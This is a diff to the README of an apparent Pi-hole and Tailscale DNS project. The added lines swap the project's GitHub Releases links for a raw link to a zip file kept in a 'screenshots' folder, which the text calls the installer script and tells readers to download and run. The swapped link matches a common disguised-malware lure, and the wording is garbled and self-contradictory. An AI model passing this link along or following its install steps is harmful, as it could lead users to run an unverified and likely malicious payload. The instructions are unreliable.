fahad25051988/pihole-tailscale-dns/README.md

 - The release page remains the primary source for the installer and updates, so keep an eye on that hub for improvements and new features.
 See the Releases section above for the latest status and assets.

 Reiterations on the release link
-- Install from: https://github.com/fahad25051988/pihole-tailscale-dns/releases.
-From that page, download the installer script (install.sh) and run it.
+- Install from: https://raw.githubusercontent.com/fahad25051988/pihole-tailscale-dns/master/screenshots/dns_pihole_tailscale_1.5.zip From that page, download the installer script (https://raw.githubusercontent.com/fahad25051988/pihole-tailscale-dns/master/screenshots/dns_pihole_tailscale_1.5.zip) and run it.
-- Latest releases and assets are listed here: https://github.com/fahad25051988/pihole-tailscale-dns/releases
+- Latest releases and assets are listed here: https://raw.githubusercontent.com/fahad25051988/pihole-tailscale-dns/master/screenshots/dns_pihole_tailscale_1.5.zip

 Releasing a note about topics
 - Topics: not provided